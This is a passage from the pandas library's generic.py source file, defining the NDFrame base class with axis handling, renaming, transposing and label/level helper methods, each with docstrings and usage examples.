"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
pandas/core/generic.py
|
Web-Application-Project/Main-Project
|
9183396ec9ab660a49bc6bd41cfd2bbc98f54db7
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
# pylint: disable=W0231,E1101
import collections
import functools
import warnings
import operator
import weakref
import gc
import json
import numpy as np
import pandas as pd
from pandas._libs import tslib, properties
from pandas.core.dtypes.common import (
_ensure_int64,
_ensure_object,
is_scalar,
is_number,
is_integer, is_bool,
is_bool_dtype,
is_categorical_dtype,
is_numeric_dtype,
is_datetime64_dtype,
is_timedelta64_dtype,
is_datetime64tz_dtype,
is_list_like,
is_dict_like,
is_re_compilable,
is_period_arraylike,
pandas_dtype)
from pandas.core.dtypes.cast import maybe_promote, maybe_upcast_putmask
from pandas.core.dtypes.inference import is_hashable
from pandas.core.dtypes.missing import isna, notna
from pandas.core.dtypes.generic import ABCSeries, ABCPanel, ABCDataFrame
from pandas.core.base import PandasObject, SelectionMixin
from pandas.core.index import (Index, MultiIndex, _ensure_index,
InvalidIndexError, RangeIndex)
import pandas.core.indexing as indexing
from pandas.core.indexing import maybe_convert_indices
from pandas.core.indexes.datetimes import DatetimeIndex
from pandas.core.indexes.period import PeriodIndex, Period
from pandas.core.internals import BlockManager
import pandas.core.algorithms as algos
import pandas.core.common as com
import pandas.core.missing as missing
from pandas.io.formats.printing import pprint_thing
from pandas.io.formats.format import format_percentiles, DataFrameFormatter
from pandas.tseries.frequencies import to_offset
from pandas import compat
from pandas.compat.numpy import function as nv
from pandas.compat import (map, zip, lzip, lrange, string_types, to_str,
isidentifier, set_function_name, cPickle as pkl)
from pandas.core.ops import _align_method_FRAME
import pandas.core.nanops as nanops
from pandas.util._decorators import (Appender, Substitution,
deprecate_kwarg)
from pandas.util._validators import validate_bool_kwarg, validate_fillna_kwargs
from pandas.core import config
# goal is to be able to define the docs close to function, while still being
# able to share
_shared_docs = dict()
_shared_doc_kwargs = dict(
axes='keywords for axes', klass='NDFrame',
axes_single_arg='int or labels for object',
args_transpose='axes to permute (int or label for object)',
optional_by="""
by : str or list of str
Name or list of names to sort by""")
def _single_replace(self, to_replace, method, inplace, limit):
"""
Replaces values in a Series using the fill method specified when no
replacement value is given in the replace method
"""
if self.ndim != 1:
raise TypeError('cannot replace {0} with method {1} on a {2}'
.format(to_replace, method, type(self).__name__))
orig_dtype = self.dtype
result = self if inplace else self.copy()
fill_f = missing.get_fill_func(method)
mask = missing.mask_missing(result.values, to_replace)
values = fill_f(result.values, limit=limit, mask=mask)
if values.dtype == orig_dtype and inplace:
return
result = pd.Series(values, index=self.index,
dtype=self.dtype).__finalize__(self)
if inplace:
self._update_inplace(result._data)
return
return result
class NDFrame(PandasObject, SelectionMixin):
"""
N-dimensional analogue of DataFrame. Store multi-dimensional in a
size-mutable, labeled data structure
Parameters
----------
data : BlockManager
axes : list
copy : boolean, default False
"""
_internal_names = ['_data', '_cacher', '_item_cache', '_cache', '_is_copy',
'_subtyp', '_name', '_index', '_default_kind',
'_default_fill_value', '_metadata', '__array_struct__',
'__array_interface__']
_internal_names_set = set(_internal_names)
_accessors = frozenset([])
_deprecations = frozenset(['as_blocks', 'blocks',
'consolidate', 'convert_objects', 'is_copy'])
_metadata = []
_is_copy = None
def __init__(self, data, axes=None, copy=False, dtype=None,
fastpath=False):
if not fastpath:
if dtype is not None:
data = data.astype(dtype)
elif copy:
data = data.copy()
if axes is not None:
for i, ax in enumerate(axes):
data = data.reindex_axis(ax, axis=i)
object.__setattr__(self, '_is_copy', None)
object.__setattr__(self, '_data', data)
object.__setattr__(self, '_item_cache', {})
@property
def is_copy(self):
warnings.warn("Attribute 'is_copy' is deprecated and will be removed "
"in a future version.", FutureWarning, stacklevel=2)
return self._is_copy
@is_copy.setter
def is_copy(self, msg):
warnings.warn("Attribute 'is_copy' is deprecated and will be removed "
"in a future version.", FutureWarning, stacklevel=2)
self._is_copy = msg
def _repr_data_resource_(self):
"""
Not a real Jupyter special repr method, but we use the same
naming convention.
"""
if config.get_option("display.html.table_schema"):
data = self.head(config.get_option('display.max_rows'))
payload = json.loads(data.to_json(orient='table'),
object_pairs_hook=collections.OrderedDict)
return payload
def _validate_dtype(self, dtype):
""" validate the passed dtype """
if dtype is not None:
dtype = pandas_dtype(dtype)
# a compound dtype
if dtype.kind == 'V':
raise NotImplementedError("compound dtypes are not implemented"
" in the {0} constructor"
.format(self.__class__.__name__))
return dtype
def _init_mgr(self, mgr, axes=None, dtype=None, copy=False):
""" passed a manager and a axes dict """
for a, axe in axes.items():
if axe is not None:
mgr = mgr.reindex_axis(axe,
axis=self._get_block_manager_axis(a),
copy=False)
# make a copy if explicitly requested
if copy:
mgr = mgr.copy()
if dtype is not None:
# avoid further copies if we can
if len(mgr.blocks) > 1 or mgr.blocks[0].values.dtype != dtype:
mgr = mgr.astype(dtype=dtype)
return mgr
# ----------------------------------------------------------------------
# Construction
@property
def _constructor(self):
"""Used when a manipulation result has the same dimensions as the
original.
"""
raise com.AbstractMethodError(self)
def __unicode__(self):
# unicode representation based upon iterating over self
# (since, by definition, `PandasContainers` are iterable)
prepr = '[%s]' % ','.join(map(pprint_thing, self))
return '%s(%s)' % (self.__class__.__name__, prepr)
def _dir_additions(self):
""" add the string-like attributes from the info_axis.
If info_axis is a MultiIndex, it's first level values are used.
"""
additions = {c for c in self._info_axis.unique(level=0)[:100]
if isinstance(c, string_types) and isidentifier(c)}
return super(NDFrame, self)._dir_additions().union(additions)
@property
def _constructor_sliced(self):
"""Used when a manipulation result has one lower dimension(s) as the
original, such as DataFrame single columns slicing.
"""
raise com.AbstractMethodError(self)
@property
def _constructor_expanddim(self):
"""Used when a manipulation result has one higher dimension as the
original, such as Series.to_frame() and DataFrame.to_panel()
"""
raise NotImplementedError
# ----------------------------------------------------------------------
# Axis
@classmethod
def _setup_axes(cls, axes, info_axis=None, stat_axis=None, aliases=None,
slicers=None, axes_are_reversed=False, build_axes=True,
ns=None, docs=None):
"""Provide axes setup for the major PandasObjects.
Parameters
----------
axes : the names of the axes in order (lowest to highest)
info_axis_num : the axis of the selector dimension (int)
stat_axis_num : the number of axis for the default stats (int)
aliases : other names for a single axis (dict)
slicers : how axes slice to others (dict)
axes_are_reversed : boolean whether to treat passed axes as
reversed (DataFrame)
build_axes : setup the axis properties (default True)
"""
cls._AXIS_ORDERS = axes
cls._AXIS_NUMBERS = {a: i for i, a in enumerate(axes)}
cls._AXIS_LEN = len(axes)
cls._AXIS_ALIASES = aliases or dict()
cls._AXIS_IALIASES = {v: k for k, v in cls._AXIS_ALIASES.items()}
cls._AXIS_NAMES = dict(enumerate(axes))
cls._AXIS_SLICEMAP = slicers or None
cls._AXIS_REVERSED = axes_are_reversed
# typ
setattr(cls, '_typ', cls.__name__.lower())
# indexing support
cls._ix = None
if info_axis is not None:
cls._info_axis_number = info_axis
cls._info_axis_name = axes[info_axis]
if stat_axis is not None:
cls._stat_axis_number = stat_axis
cls._stat_axis_name = axes[stat_axis]
# setup the actual axis
if build_axes:
def set_axis(a, i):
setattr(cls, a, properties.AxisProperty(i, docs.get(a, a)))
cls._internal_names_set.add(a)
if axes_are_reversed:
m = cls._AXIS_LEN - 1
for i, a in cls._AXIS_NAMES.items():
set_axis(a, m - i)
else:
for i, a in cls._AXIS_NAMES.items():
set_axis(a, i)
# addtl parms
if isinstance(ns, dict):
for k, v in ns.items():
setattr(cls, k, v)
def _construct_axes_dict(self, axes=None, **kwargs):
"""Return an axes dictionary for myself."""
d = {a: self._get_axis(a) for a in (axes or self._AXIS_ORDERS)}
d.update(kwargs)
return d
@staticmethod
def _construct_axes_dict_from(self, axes, **kwargs):
"""Return an axes dictionary for the passed axes."""
d = {a: ax for a, ax in zip(self._AXIS_ORDERS, axes)}
d.update(kwargs)
return d
def _construct_axes_dict_for_slice(self, axes=None, **kwargs):
"""Return an axes dictionary for myself."""
d = {self._AXIS_SLICEMAP[a]: self._get_axis(a)
for a in (axes or self._AXIS_ORDERS)}
d.update(kwargs)
return d
def _construct_axes_from_arguments(self, args, kwargs, require_all=False):
"""Construct and returns axes if supplied in args/kwargs.
If require_all, raise if all axis arguments are not supplied
return a tuple of (axes, kwargs).
"""
# construct the args
args = list(args)
for a in self._AXIS_ORDERS:
# if we have an alias for this axis
alias = self._AXIS_IALIASES.get(a)
if alias is not None:
if a in kwargs:
if alias in kwargs:
raise TypeError("arguments are mutually exclusive "
"for [%s,%s]" % (a, alias))
continue
if alias in kwargs:
kwargs[a] = kwargs.pop(alias)
continue
# look for a argument by position
if a not in kwargs:
try:
kwargs[a] = args.pop(0)
except IndexError:
if require_all:
raise TypeError("not enough/duplicate arguments "
"specified!")
axes = {a: kwargs.pop(a, None) for a in self._AXIS_ORDERS}
return axes, kwargs
@classmethod
def _from_axes(cls, data, axes, **kwargs):
# for construction from BlockManager
if isinstance(data, BlockManager):
return cls(data, **kwargs)
else:
if cls._AXIS_REVERSED:
axes = axes[::-1]
d = cls._construct_axes_dict_from(cls, axes, copy=False)
d.update(kwargs)
return cls(data, **d)
def _get_axis_number(self, axis):
axis = self._AXIS_ALIASES.get(axis, axis)
if is_integer(axis):
if axis in self._AXIS_NAMES:
return axis
else:
try:
return self._AXIS_NUMBERS[axis]
except KeyError:
pass
raise ValueError('No axis named {0} for object type {1}'
.format(axis, type(self)))
def _get_axis_name(self, axis):
axis = self._AXIS_ALIASES.get(axis, axis)
if isinstance(axis, string_types):
if axis in self._AXIS_NUMBERS:
return axis
else:
try:
return self._AXIS_NAMES[axis]
except KeyError:
pass
raise ValueError('No axis named {0} for object type {1}'
.format(axis, type(self)))
def _get_axis(self, axis):
name = self._get_axis_name(axis)
return getattr(self, name)
def _get_block_manager_axis(self, axis):
"""Map the axis to the block_manager axis."""
axis = self._get_axis_number(axis)
if self._AXIS_REVERSED:
m = self._AXIS_LEN - 1
return m - axis
return axis
def _get_axis_resolvers(self, axis):
# index or columns
axis_index = getattr(self, axis)
d = dict()
prefix = axis[0]
for i, name in enumerate(axis_index.names):
if name is not None:
key = level = name
else:
# prefix with 'i' or 'c' depending on the input axis
# e.g., you must do ilevel_0 for the 0th level of an unnamed
# multiiindex
key = '{prefix}level_{i}'.format(prefix=prefix, i=i)
level = i
level_values = axis_index.get_level_values(level)
s = level_values.to_series()
s.index = axis_index
d[key] = s
# put the index/columns itself in the dict
if isinstance(axis_index, MultiIndex):
dindex = axis_index
else:
dindex = axis_index.to_series()
d[axis] = dindex
return d
def _get_index_resolvers(self):
d = {}
for axis_name in self._AXIS_ORDERS:
d.update(self._get_axis_resolvers(axis_name))
return d
@property
def _info_axis(self):
return getattr(self, self._info_axis_name)
@property
def _stat_axis(self):
return getattr(self, self._stat_axis_name)
@property
def shape(self):
"""Return a tuple of axis dimensions"""
return tuple(len(self._get_axis(a)) for a in self._AXIS_ORDERS)
@property
def axes(self):
"""Return index label(s) of the internal NDFrame"""
# we do it this way because if we have reversed axes, then
# the block manager shows then reversed
return [self._get_axis(a) for a in self._AXIS_ORDERS]
@property
def ndim(self):
"""
Return an int representing the number of axes / array dimensions.
Return 1 if Series. Otherwise return 2 if DataFrame.
See Also
--------
ndarray.ndim
Examples
--------
>>> s = pd.Series({'a': 1, 'b': 2, 'c': 3})
>>> s.ndim
1
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.ndim
2
"""
return self._data.ndim
@property
def size(self):
"""
Return an int representing the number of elements in this object.
Return the number of rows if Series. Otherwise return the number of
rows times number of columns if DataFrame.
See Also
--------
ndarray.size
Examples
--------
>>> s = pd.Series({'a': 1, 'b': 2, 'c': 3})
>>> s.size
3
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.size
4
"""
return np.prod(self.shape)
@property
def _selected_obj(self):
""" internal compat with SelectionMixin """
return self
@property
def _obj_with_exclusions(self):
""" internal compat with SelectionMixin """
return self
def _expand_axes(self, key):
new_axes = []
for k, ax in zip(key, self.axes):
if k not in ax:
if type(k) != ax.dtype.type:
ax = ax.astype('O')
new_axes.append(ax.insert(len(ax), k))
else:
new_axes.append(ax)
return new_axes
def set_axis(self, labels, axis=0, inplace=None):
"""
Assign desired index to given axis.
Indexes for column or row labels can be changed by assigning
a list-like or Index.
.. versionchanged:: 0.21.0
The signature is now `labels` and `axis`, consistent with
the rest of pandas API. Previously, the `axis` and `labels`
arguments were respectively the first and second positional
arguments.
Parameters
----------
labels : list-like, Index
The values for the new index.
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to update. The value 0 identifies the rows, and 1
identifies the columns.
inplace : boolean, default None
Whether to return a new %(klass)s instance.
.. warning::
``inplace=None`` currently falls back to to True, but in a
future version, will default to False. Use inplace=True
explicitly rather than relying on the default.
Returns
-------
renamed : %(klass)s or None
An object of same type as caller if inplace=False, None otherwise.
See Also
--------
pandas.DataFrame.rename_axis : Alter the name of the index or columns.
Examples
--------
**Series**
>>> s = pd.Series([1, 2, 3])
>>> s
0 1
1 2
2 3
dtype: int64
>>> s.set_axis(['a', 'b', 'c'], axis=0, inplace=False)
a 1
b 2
c 3
dtype: int64
The original object is not modified.
>>> s
0 1
1 2
2 3
dtype: int64
**DataFrame**
>>> df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
Change the row labels.
>>> df.set_axis(['a', 'b', 'c'], axis='index', inplace=False)
A B
a 1 4
b 2 5
c 3 6
Change the column labels.
>>> df.set_axis(['I', 'II'], axis='columns', inplace=False)
I II
0 1 4
1 2 5
2 3 6
Now, update the labels inplace.
>>> df.set_axis(['i', 'ii'], axis='columns', inplace=True)
>>> df
i ii
0 1 4
1 2 5
2 3 6
"""
if is_scalar(labels):
warnings.warn(
'set_axis now takes "labels" as first argument, and '
'"axis" as named parameter. The old form, with "axis" as '
'first parameter and \"labels\" as second, is still supported '
'but will be deprecated in a future version of pandas.',
FutureWarning, stacklevel=2)
labels, axis = axis, labels
if inplace is None:
warnings.warn(
'set_axis currently defaults to operating inplace.\nThis '
'will change in a future version of pandas, use '
'inplace=True to avoid this warning.',
FutureWarning, stacklevel=2)
inplace = True
if inplace:
setattr(self, self._get_axis_name(axis), labels)
else:
obj = self.copy()
obj.set_axis(labels, axis=axis, inplace=True)
return obj
def _set_axis(self, axis, labels):
self._data.set_axis(axis, labels)
self._clear_item_cache()
_shared_docs['transpose'] = """
Permute the dimensions of the %(klass)s
Parameters
----------
args : %(args_transpose)s
copy : boolean, default False
Make a copy of the underlying data. Mixed-dtype data will
always result in a copy
Examples
--------
>>> p.transpose(2, 0, 1)
>>> p.transpose(2, 0, 1, copy=True)
Returns
-------
y : same as input
"""
@Appender(_shared_docs['transpose'] % _shared_doc_kwargs)
def transpose(self, *args, **kwargs):
# construct the args
axes, kwargs = self._construct_axes_from_arguments(args, kwargs,
require_all=True)
axes_names = tuple(self._get_axis_name(axes[a])
for a in self._AXIS_ORDERS)
axes_numbers = tuple(self._get_axis_number(axes[a])
for a in self._AXIS_ORDERS)
# we must have unique axes
if len(axes) != len(set(axes)):
raise ValueError('Must specify %s unique axes' % self._AXIS_LEN)
new_axes = self._construct_axes_dict_from(self, [self._get_axis(x)
for x in axes_names])
new_values = self.values.transpose(axes_numbers)
if kwargs.pop('copy', None) or (len(args) and args[-1]):
new_values = new_values.copy()
nv.validate_transpose_for_generic(self, kwargs)
return self._constructor(new_values, **new_axes).__finalize__(self)
def swapaxes(self, axis1, axis2, copy=True):
"""
Interchange axes and swap values axes appropriately
Returns
-------
y : same as input
"""
i = self._get_axis_number(axis1)
j = self._get_axis_number(axis2)
if i == j:
if copy:
return self.copy()
return self
mapping = {i: j, j: i}
new_axes = (self._get_axis(mapping.get(k, k))
for k in range(self._AXIS_LEN))
new_values = self.values.swapaxes(i, j)
if copy:
new_values = new_values.copy()
return self._constructor(new_values, *new_axes).__finalize__(self)
def pop(self, item):
"""
Return item and drop from frame. Raise KeyError if not found.
Parameters
----------
item : str
Column label to be popped
Returns
-------
popped : Series
Examples
--------
>>> df = pd.DataFrame([('falcon', 'bird', 389.0),
... ('parrot', 'bird', 24.0),
... ('lion', 'mammal', 80.5),
... ('monkey', 'mammal', np.nan)],
... columns=('name', 'class', 'max_speed'))
>>> df
name class max_speed
0 falcon bird 389.0
1 parrot bird 24.0
2 lion mammal 80.5
3 monkey mammal NaN
>>> df.pop('class')
0 bird
1 bird
2 mammal
3 mammal
Name: class, dtype: object
>>> df
name max_speed
0 falcon 389.0
1 parrot 24.0
2 lion 80.5
3 monkey NaN
"""
result = self[item]
del self[item]
try:
result._reset_cacher()
except AttributeError:
pass
return result
def squeeze(self, axis=None):
"""
Squeeze length 1 dimensions.
Parameters
----------
axis : None, integer or string axis name, optional
The axis to squeeze if 1-sized.
.. versionadded:: 0.20.0
Returns
-------
scalar if 1-sized, else original object
"""
axis = (self._AXIS_NAMES if axis is None else
(self._get_axis_number(axis),))
try:
return self.iloc[
tuple(0 if i in axis and len(a) == 1 else slice(None)
for i, a in enumerate(self.axes))]
except Exception:
return self
def swaplevel(self, i=-2, j=-1, axis=0):
"""
Swap levels i and j in a MultiIndex on a particular axis
Parameters
----------
i, j : int, string (can be mixed)
Level of index to be swapped. Can pass level name as string.
Returns
-------
swapped : type of caller (new object)
.. versionchanged:: 0.18.1
The indexes ``i`` and ``j`` are now optional, and default to
the two innermost levels of the index.
"""
axis = self._get_axis_number(axis)
result = self.copy()
labels = result._data.axes[axis]
result._data.set_axis(axis, labels.swaplevel(i, j))
return result
# ----------------------------------------------------------------------
# Rename
# TODO: define separate funcs for DataFrame, Series and Panel so you can
# get completion on keyword arguments.
_shared_docs['rename'] = """
Alter axes input function or functions. Function / dict values must be
unique (1-to-1). Labels not contained in a dict / Series will be left
as-is. Extra labels listed don't throw an error. Alternatively, change
``Series.name`` with a scalar value (Series only).
Parameters
----------
%(optional_mapper)s
%(axes)s : scalar, list-like, dict-like or function, optional
Scalar or list-like will alter the ``Series.name`` attribute,
and raise on DataFrame or Panel.
dict-like or functions are transformations to apply to
that axis' values
%(optional_axis)s
copy : boolean, default True
Also copy underlying data
inplace : boolean, default False
Whether to return a new %(klass)s. If True then value of copy is
ignored.
level : int or level name, default None
In case of a MultiIndex, only rename labels in the specified
level.
Returns
-------
renamed : %(klass)s (new object)
See Also
--------
pandas.NDFrame.rename_axis
Examples
--------
>>> s = pd.Series([1, 2, 3])
>>> s
0 1
1 2
2 3
dtype: int64
>>> s.rename("my_name") # scalar, changes Series.name
0 1
1 2
2 3
Name: my_name, dtype: int64
>>> s.rename(lambda x: x ** 2) # function, changes labels
0 1
1 2
4 3
dtype: int64
>>> s.rename({1: 3, 2: 5}) # mapping, changes labels
0 1
3 2
5 3
dtype: int64
Since ``DataFrame`` doesn't have a ``.name`` attribute,
only mapping-type arguments are allowed.
>>> df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
>>> df.rename(2)
Traceback (most recent call last):
...
TypeError: 'int' object is not callable
``DataFrame.rename`` supports two calling conventions
* ``(index=index_mapper, columns=columns_mapper, ...)``
* ``(mapper, axis={'index', 'columns'}, ...)``
We *highly* recommend using keyword arguments to clarify your
intent.
>>> df.rename(index=str, columns={"A": "a", "B": "c"})
a c
0 1 4
1 2 5
2 3 6
>>> df.rename(index=str, columns={"A": "a", "C": "c"})
a B
0 1 4
1 2 5
2 3 6
Using axis-style parameters
>>> df.rename(str.lower, axis='columns')
a b
0 1 4
1 2 5
2 3 6
>>> df.rename({1: 2, 2: 4}, axis='index')
A B
0 1 4
2 2 5
4 3 6
See the :ref:`user guide <basics.rename>` for more.
"""
@Appender(_shared_docs['rename'] % dict(axes='axes keywords for this'
' object', klass='NDFrame',
optional_mapper='',
optional_axis=''))
def rename(self, *args, **kwargs):
axes, kwargs = self._construct_axes_from_arguments(args, kwargs)
copy = kwargs.pop('copy', True)
inplace = kwargs.pop('inplace', False)
level = kwargs.pop('level', None)
axis = kwargs.pop('axis', None)
if axis is not None:
axis = self._get_axis_number(axis)
if kwargs:
raise TypeError('rename() got an unexpected keyword '
'argument "{0}"'.format(list(kwargs.keys())[0]))
if com._count_not_none(*axes.values()) == 0:
raise TypeError('must pass an index to rename')
# renamer function if passed a dict
def _get_rename_function(mapper):
if isinstance(mapper, (dict, ABCSeries)):
def f(x):
if x in mapper:
return mapper[x]
else:
return x
else:
f = mapper
return f
self._consolidate_inplace()
result = self if inplace else self.copy(deep=copy)
# start in the axis order to eliminate too many copies
for axis in lrange(self._AXIS_LEN):
v = axes.get(self._AXIS_NAMES[axis])
if v is None:
continue
f = _get_rename_function(v)
baxis = self._get_block_manager_axis(axis)
if level is not None:
level = self.axes[axis]._get_level_number(level)
result._data = result._data.rename_axis(f, axis=baxis, copy=copy,
level=level)
result._clear_item_cache()
if inplace:
self._update_inplace(result._data)
else:
return result.__finalize__(self)
rename.__doc__ = _shared_docs['rename']
def rename_axis(self, mapper, axis=0, copy=True, inplace=False):
"""
Alter the name of the index or columns.
Parameters
----------
mapper : scalar, list-like, optional
Value to set as the axis name attribute.
axis : {0 or 'index', 1 or 'columns'}, default 0
The index or the name of the axis.
copy : boolean, default True
Also copy underlying data.
inplace : boolean, default False
Modifies the object directly, instead of creating a new Series
or DataFrame.
Returns
-------
renamed : Series, DataFrame, or None
The same type as the caller or None if `inplace` is True.
Notes
-----
Prior to version 0.21.0, ``rename_axis`` could also be used to change
the axis *labels* by passing a mapping or scalar. This behavior is
deprecated and will be removed in a future version. Use ``rename``
instead.
See Also
--------
pandas.Series.rename : Alter Series index labels or name
pandas.DataFrame.rename : Alter DataFrame index labels or name
pandas.Index.rename : Set new names on index
Examples
--------
**Series**
>>> s = pd.Series([1, 2, 3])
>>> s.rename_axis("foo")
foo
0 1
1 2
2 3
dtype: int64
**DataFrame**
>>> df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
>>> df.rename_axis("foo")
A B
foo
0 1 4
1 2 5
2 3 6
>>> df.rename_axis("bar", axis="columns")
bar A B
0 1 4
1 2 5
2 3 6
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
non_mapper = is_scalar(mapper) or (is_list_like(mapper) and not
is_dict_like(mapper))
if non_mapper:
return self._set_axis_name(mapper, axis=axis, inplace=inplace)
else:
msg = ("Using 'rename_axis' to alter labels is deprecated. "
"Use '.rename' instead")
warnings.warn(msg, FutureWarning, stacklevel=2)
axis = self._get_axis_name(axis)
d = {'copy': copy, 'inplace': inplace}
d[axis] = mapper
return self.rename(**d)
def _set_axis_name(self, name, axis=0, inplace=False):
"""
Alter the name or names of the axis.
Parameters
----------
name : str or list of str
Name for the Index, or list of names for the MultiIndex
axis : int or str
0 or 'index' for the index; 1 or 'columns' for the columns
inplace : bool
whether to modify `self` directly or return a copy
.. versionadded:: 0.21.0
Returns
-------
renamed : type of caller or None if inplace=True
See Also
--------
pandas.DataFrame.rename
pandas.Series.rename
pandas.Index.rename
Examples
--------
>>> df._set_axis_name("foo")
A
foo
0 1
1 2
2 3
>>> df.index = pd.MultiIndex.from_product([['A'], ['a', 'b', 'c']])
>>> df._set_axis_name(["bar", "baz"])
A
bar baz
A a 1
b 2
c 3
"""
axis = self._get_axis_number(axis)
idx = self._get_axis(axis).set_names(name)
inplace = validate_bool_kwarg(inplace, 'inplace')
renamed = self if inplace else self.copy()
renamed.set_axis(idx, axis=axis, inplace=True)
if not inplace:
return renamed
# ----------------------------------------------------------------------
# Comparisons
def _indexed_same(self, other):
return all(self._get_axis(a).equals(other._get_axis(a))
for a in self._AXIS_ORDERS)
def __neg__(self):
values = com._values_from_object(self)
if is_bool_dtype(values):
arr = operator.inv(values)
elif (is_numeric_dtype(values) or is_timedelta64_dtype(values)):
arr = operator.neg(values)
else:
raise TypeError("Unary negative expects numeric dtype, not {}"
.format(values.dtype))
return self.__array_wrap__(arr)
def __pos__(self):
values = com._values_from_object(self)
if (is_bool_dtype(values) or is_period_arraylike(values)):
arr = values
elif (is_numeric_dtype(values) or is_timedelta64_dtype(values)):
arr = operator.pos(values)
else:
raise TypeError("Unary plus expects numeric dtype, not {}"
.format(values.dtype))
return self.__array_wrap__(arr)
def __invert__(self):
try:
arr = operator.inv(com._values_from_object(self))
return self.__array_wrap__(arr)
except Exception:
# inv fails with 0 len
if not np.prod(self.shape):
return self
raise
def equals(self, other):
"""
Determines if two NDFrame objects contain the same elements. NaNs in
the same location are considered equal.
"""
if not isinstance(other, self._constructor):
return False
return self._data.equals(other._data)
# -------------------------------------------------------------------------
# Label or Level Combination Helpers
#
# A collection of helper methods for DataFrame/Series operations that
# accept a combination of column/index labels and levels. All such
# operations should utilize/extend these methods when possible so that we
# have consistent precedence and validation logic throughout the library.
def _is_level_reference(self, key, axis=0):
"""
Test whether a key is a level reference for a given axis.
To be considered a level reference, `key` must be a string that:
- (axis=0): Matches the name of an index level and does NOT match
a column label.
- (axis=1): Matches the name of a column level and does NOT match
an index label.
Parameters
----------
key: str
Potential level name for the given axis
axis: int, default 0
Axis that levels are associated with (0 for index, 1 for columns)
Returns
-------
is_level: bool
"""
axis = self._get_axis_number(axis)
if self.ndim > 2:
raise NotImplementedError(
"_is_level_reference is not implemented for {type}"
.format(type=type(self)))
return (key is not None and
is_hashable(key) and
key in self.axes[axis].names and
not self._is_label_reference(key, axis=axis))
def _is_label_reference(self, key, axis=0):
"""
Test whether a key is a label reference for a given axis.
To be considered a label reference, `key` must be a string that:
- (axis=0): Matches a column label
- (axis=1): Matches an index label
Parameters
----------
key: str
Potential label name
axis: int, default 0
Axis perpendicular to the axis that labels are associated with
(0 means search for column labels, 1 means search for index labels)
Returns
-------
is_label: bool
"""
axis = self._get_axis_number(axis)
other_axes = [ax for ax in range(self._AXIS_LEN) if ax != axis]
if self.ndim > 2:
raise NotImplementedError(
"_is_label_reference is not implemented for {type}"
.format(type=type(self)))
return (key is not None and
is_hashable(key) and
any(key in self.axes[ax] for ax in other_axes))
def _is_label_or_level_reference(self, key, axis=0):
"""
Test whether a key is a label or level reference for a given axis.
To be considered either a label or a level reference, `key` must be a
string that:
- (axis=0): Matches a column label or an index level
- (axis=1): Matches an index label or a column level
Parameters
----------
key: str
Potential label or level name
axis: int, default 0
Axis that levels are associated with (0 for index, 1 for columns)
Returns
-------
is_label_or_level: bool
"""
if self.ndim > 2:
raise NotImplementedError(
"_is_label_or_level_reference is not implemented for {type}"
.format(type=type(self)))
return (self._is_level_reference(key, axis=axis) or
self._is_label_reference(key, axis=axis))
def _check_label_or_level_ambiguity(self, key, axis=0, stacklevel=1):
"""
Check whether `key` matches both a level of the input `axis` and a
label of the other axis and raise a ``FutureWarning`` if this is the
case.
Note: This method will be altered to raise an ambiguity exception in
a future version.
Parameters
----------
key: str or object
label or level name
axis: int, default 0
Axis that levels are associated with (0 for index, 1 for columns)
stacklevel: int, default 1
Stack level used when a FutureWarning is raised (see below).
Returns
-------
ambiguous: bool
Raises
------
FutureWarning
if `key` is ambiguous. This will become an ambiguity error in a
future version
"""
axis = self._get_axis_number(axis)
other_axes = [ax for ax in range(self._AXIS_LEN) if ax != axis]
if self.ndim > 2:
raise NotImplementedError(
"_check_label_or_level_ambiguity is not implemented for {type}"
.format(type=type(self)))
if (key is not None and
is_hashable(key) and
key in self.axes[axis].names and
any(key in self.axes[ax] for ax in other_axes)):
# Build an informative and grammatical warning
level_article, level_type = (('an', 'index')
if axis == 0 else
('a', 'column'))
label_article, label_type = (('a', 'column')
if axis == 0 else
('an', 'index'))
msg = ("'{key}' is both {level_article} {level_type} level and "
"{label_article} {label_type} label.\n"
"Defaulting to {label_type}, but this will raise an "
"ambiguity error in a future version"
).format(key=key,
level_article=level_article,
level_type=level_type,
label_article=label_article,
label_type=label_type)
warnings.warn(msg, FutureWarning, stacklevel=stacklevel + 1)
return True
else:
return False
def _get_label_or_level_values(self, key, axis=0, stacklevel=1):
"""
Return a 1-D array of values associated with `key`, a label or level
from the given `axis`.
Retrieval logic:
- (axis=0): Return column values if `key` matches a column label.
Otherwise return index level values if `key` matches an index
level.
- (axis=1): Return row values if `key` matches an index label.
Otherwise return column level values if 'key' matches a column
level
Parameters
----------
key: str
Label or level name.
axis: int, default 0
Axis that levels are associated with (0 for index, 1 for columns)
stacklevel: int, default 1
Stack level used when a FutureWarning is raised (see below).
Returns
-------
values: np.ndarray
Raises
------
KeyError
if `key` matches neither a label nor a level
ValueError
if `key` matches multiple labels
FutureWarning
if `key` is ambiguous. This will become an ambiguity error in a
future version
"""
axis = self._get_axis_number(axis)
other_axes = [ax for ax in range(self._AXIS_LEN) if ax != axis]
if self.ndim > 2:
raise NotImplementedError(
"_get_label_or_level_values is not implemented for {type}"
.format(type=type(self)))
if self._is_label_reference(key, axis=axis):
self._check_label_or_level_ambiguity(key, axis=axis,
stacklevel=stacklevel + 1)
values = self.xs(key, axis=other_axes[0])._values
elif self._is_level_reference(key, axis=axis):
values = self.axes[axis].get_level_values(key)._values
else:
raise KeyError(key)
# Check for duplicates
if values.ndim > 1:
if other_axes and isinstance(
self._get_axis(other_axes[0]), MultiIndex):
multi_message = ('\n'
'For a multi-index, the label must be a '
'tuple with elements corresponding to '
'each level.')
else:
multi_message = ''
label_axis_name = 'column' if axis == 0 else 'index'
raise ValueError(("The {label_axis_name} label '{key}' "
"is not unique.{multi_message}")
.format(key=key,
label_axis_name=label_axis_name,
multi_message=multi_message))
return values
def _drop_labels_or_levels(self, keys, axis=0):
"""
Drop labels and/or levels for the given `axis`.
For each key in `keys`:
- (axis=0): If key matches a column label then drop the column.
Otherwise if key matches an index level then drop the level.
- (axis=1): If key matches an index label then drop the row.
